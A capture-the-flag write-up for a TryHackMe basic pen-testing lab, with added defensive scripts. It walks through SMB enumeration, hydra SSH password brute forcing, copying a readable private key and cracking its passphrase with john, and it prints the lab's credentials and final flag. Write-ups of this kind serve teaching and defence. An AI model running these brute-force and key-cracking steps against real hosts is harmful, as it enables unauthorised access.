# THM Basic Pen-Testing Machine

<figure><img src="https://tryhackme-images.s3.amazonaws.com/room-icons/99c72676aab814b94e3bc350ba627b71.png" alt=""><figcaption></figcaption></figure>

**Target IP Address**

```
10.10.142.239
```

## Nmap Scan Report

Open ports and services:

```
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy
```

There are several open ports, so we enumerate them one by one; a few of these services are what give us the initial foothold.

## Web server Enumeration

### Hidden Directory Scan

```bash
# port 80 is plain HTTP, and the Kali wordlist directory is /usr/share/wordlists
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://$IP/FUZZ

/development
```

This hidden directory holds a note telling us that there are two users, one whose name starts with `j` and another whose name starts with `k`, and that one of them has a weak password.

## SMB Enumeration

Using the Nmap SMB enumeration scripts we found the following shares:

```
# the share listing below comes from the smb-enum-shares script on port 445
$ nmap -p 445 --script=smb-enum-shares $IP

| smb-enum-shares:
|   account_used: guest
|   \\10.10.142.239\Anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.142.239\IPC$:
|     Type: STYPE_IPCHIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
```

The result above shows an `Anonymous` share that the guest account can both read and write.
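From the defender's side, the share above is a one-line mistake in `smb.conf`: `guest ok = yes` on a writable share. The following is an added example (not from the writeup or the room) that shows the weak configuration next to a hardened one and a small POSIX `sh`/`awk` checker that flags any share allowing guest write access. Both configuration texts are constructed for this example.

```bash
#!/bin/sh
# Added example, not part of the writeup: flag Samba shares that combine
# guest access with write access, which is what the nmap output reported.
# Assumes only a POSIX sh with awk. Both smb.conf texts below are constructed.

# Constructed smb.conf resembling the weak setup: an "Anonymous" share that
# any guest may read and write.
WEAK_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Bad User

[Anonymous]
   path = /samba/anonymous
   browseable = yes
   writable = yes
   guest ok = yes
   read only = no
'

# Hardened version of the same share: no guest access, read-only, and
# restricted to an explicit group.
FIXED_CONF='[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2

[Anonymous]
   path = /samba/anonymous
   browseable = no
   guest ok = no
   read only = yes
   valid users = @staff
'

# smb_guest_writable CONF_TEXT
# Prints the name of every share that is guest-accessible and writable.
# Exit status is 1 if at least one such share exists, 0 otherwise.
smb_guest_writable() {
    printf '%s\n' "$1" | awk '
        # a new [section] header: report the previous share, reset state
        /^[[:space:]]*\[/ {
            report()
            share = $0; gsub(/[^A-Za-z0-9_$]/, "", share)
            guest = 0; writable = 0
            next
        }
        # normalise "key = value" lines so spacing and case do not matter
        {
            line = tolower($0); gsub(/[[:space:]]/, "", line)
            if (line == "guestok=yes" || line == "public=yes") guest = 1
            if (line == "writable=yes" || line == "writeable=yes" || line == "readonly=no") writable = 1
        }
        function report() {
            if (share != "" && tolower(share) != "global" && guest && writable) {
                print share; found = 1
            }
        }
        END { report(); exit found ? 1 : 0 }
    '
}

# Usage: run the checker against both configurations.
smb_guest_writable "$WEAK_CONF"   # prints "Anonymous", exits 1
smb_guest_writable "$FIXED_CONF"  # prints nothing, exits 0
```

The checker only looks at the per-share keys; `map to guest` and `restrict anonymous` in `[global]` are what stop unknown users from being mapped to the guest account in the first place, so both halves of the fix matter.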

Enumerating SMB further with the Nmap `smb-enum-users` script, the corresponding Metasploit module, or similar techniques turns up the valid users.

Using SMB we found two users:

1. `jan`
2. `kay`

Now that we have valid usernames and SSH is open, we can brute force their SSH passwords. From the web server enumeration stage we know one of them has a weak password, so we use `hydra` against it.

### Hydra Bruteforce Result

Brute forcing found a valid password for one user:

```
userName: jan
password: armando
```
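A `hydra` run like the one above is loud on the target: every guess is a `Failed password` line from `sshd` in the auth log, followed by an `Accepted` line from the same source once the weak password is hit. The following is an added detection example (not from the writeup) that counts failures per source address over a few constructed auth-log lines in the stock OpenSSH format and flags sources that also went on to log in successfully. It assumes only a POSIX `sh` with `awk` and `sort`.

```bash
#!/bin/sh
# Added example, not part of the writeup: spot password-guessing sources in
# sshd auth log lines. The log lines are constructed; the format is the
# standard OpenSSH syslog one.

SAMPLE_AUTH_LOG='Mar  3 10:01:02 target sshd[1201]: Failed password for jan from 10.10.14.5 port 51002 ssh2
Mar  3 10:01:02 target sshd[1203]: Failed password for jan from 10.10.14.5 port 51004 ssh2
Mar  3 10:01:03 target sshd[1205]: Failed password for invalid user admin from 10.10.14.5 port 51006 ssh2
Mar  3 10:01:03 target sshd[1207]: Failed password for kay from 10.10.14.5 port 51008 ssh2
Mar  3 10:01:04 target sshd[1209]: Failed password for jan from 10.10.14.5 port 51010 ssh2
Mar  3 10:01:05 target sshd[1211]: Accepted password for jan from 10.10.14.5 port 51012 ssh2
Mar  3 10:05:09 target sshd[1300]: Failed password for kay from 10.10.14.9 port 40010 ssh2
Mar  3 10:06:00 target sshd[1302]: Accepted publickey for kay from 10.10.14.9 port 40012 ssh2'

# ssh_bruteforce_sources LOG_TEXT THRESHOLD
# Prints "<source-ip> <failures> <distinct-users> <login-after-failures:yes|no>"
# for every source with at least THRESHOLD failed password attempts, sorted.
ssh_bruteforce_sources() {
    printf '%s\n' "$1" | awk -v threshold="$2" '
        / sshd\[[0-9]+\]: Failed password for / {
            # the user name is the field just before "from"; this also covers
            # the "invalid user NAME from" layout
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); user = $(i-1) }
            fails[ip]++
            if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
        }
        / sshd\[[0-9]+\]: Accepted (password|publickey) for / {
            for (i = 1; i <= NF; i++) if ($i == "from") ip = $(i+1)
            # a success is only interesting if that source failed first
            if (ip in fails) success[ip] = 1
        }
        END {
            for (ip in fails)
                if (fails[ip] >= threshold)
                    printf "%s %d %d %s\n", ip, fails[ip], users[ip], (ip in success) ? "yes" : "no"
        }
    ' | sort
}

# Usage: with a threshold of 3 only the hydra-like source is reported.
ssh_bruteforce_sources "$SAMPLE_AUTH_LOG" 3   # 10.10.14.5 5 3 yes
```

The distinct-user count is the useful second signal: a single user mistyping a password once or twice looks nothing like one address cycling through several account names in the same few seconds. On a real host the input would be `/var/log/auth.log` or `journalctl -u ssh`, and a `yes` in the last column is the event to act on first.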

Now we have `jan`'s password, so we SSH to the machine to get a foothold:

```bash
$ ssh jan@10.10.142.239
# password: armando
```

Now we have initial access, so we move on to post-exploitation to gain more privileges. Running the `linpeas` script to look for privilege escalation vectors shows that the `kay` user's SSH private key is readable by `jan`. We read it, copy its contents to our attacking machine, and restrict the file's permissions so that only we can read it:

```bash
# chmod takes the octal mode directly; there is no "-600" option
$ chmod 600 kay_rsa
```

This sets the key to read/write for the owner only (SSH refuses to use a private key with looser permissions), so now we can SSH as `kay` with it:

```bash
$ ssh -i kay_rsa kay@10.10.142.239
```

Running this reveals that the key is protected by a passphrase, so we also need that passphrase to log in.
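The root cause of this escalation is simply a private key with group or world read permission in another user's home directory. The following is an added example (not from the writeup) of the audit a defender would run on a host: walk a directory tree, keep only files whose first line is a PEM/OpenSSH private-key header, and report those readable by anyone other than the owner. It assumes a POSIX `sh` with `find`, `grep`, `head` and `mktemp`; the two sample keys it creates are constructed dummy files, not real keys.

```bash
#!/bin/sh
# Added example, not part of the writeup: find private keys that other users
# can read, the misconfiguration that exposed kay's key to jan above.

# readable_private_keys DIR
# Prints the path of every file under DIR whose group or other read bit is
# set and whose first line is a private-key header, sorted.
readable_private_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) -print 2>/dev/null |
    while IFS= read -r f; do
        if head -n 1 "$f" | grep -q -- '-----BEGIN .*PRIVATE KEY-----'; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# make_demo_home builds a constructed home tree with one exposed key (0644),
# one correctly protected key (0600) and a public key, and prints its path.
make_demo_home() {
    d=$(mktemp -d)
    mkdir -p "$d/kay/.ssh" "$d/jan/.ssh"
    printf -- '-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-not-a-real-key\n-----END OPENSSH PRIVATE KEY-----\n' > "$d/kay/.ssh/id_rsa"
    printf -- '-----BEGIN RSA PRIVATE KEY-----\nconstructed-not-a-real-key\n-----END RSA PRIVATE KEY-----\n' > "$d/jan/.ssh/id_rsa"
    printf 'ssh-rsa AAAA constructed-public-key\n' > "$d/kay/.ssh/id_rsa.pub"
    chmod 644 "$d/kay/.ssh/id_rsa"     # exposed: group and other can read it
    chmod 600 "$d/jan/.ssh/id_rsa"     # correct: owner only
    chmod 644 "$d/kay/.ssh/id_rsa.pub" # public half, fine to be readable
    printf '%s\n' "$d"
}

# Usage: build the demo tree, audit it, then clean up.
home=$(make_demo_home)
readable_private_keys "$home"   # prints only .../kay/.ssh/id_rsa
rm -rf "$home"
```

On a real system the argument would be `/home` (or `/` for a fuller sweep), and the fix for every hit is the same `chmod 600` the writeup runs on the attacker side, applied by the key's owner before anyone else gets to copy it; with `StrictModes yes` (the default) `sshd` also ignores an `authorized_keys` file whose directory is group- or world-writable, but it does nothing to protect the private half.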

To recover the passphrase we use the `ssh2john` script, which converts the private key into a hash format that John the Ripper understands:

```bash
$ python ssh2john.py kay_rsa > kay_rsa.hash
```

This writes the hash of the key to `kay_rsa.hash`; now we run John against it to recover the passphrase:

```bash
$ john kay_rsa.hash --wordlist=rockyou.txt
```

This cracks the passphrase using the `rockyou.txt` wordlist.

John recovered the passphrase of `kay`'s SSH key:

```
Username: kay
Password: beeswax
```

Now that we have the key passphrase we can log in as `kay`:

```bash
$ ssh -i kay_rsa kay@10.10.142.239
# passphrase: beeswax
```

After logging in as `kay` we found the final password:

```
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
```

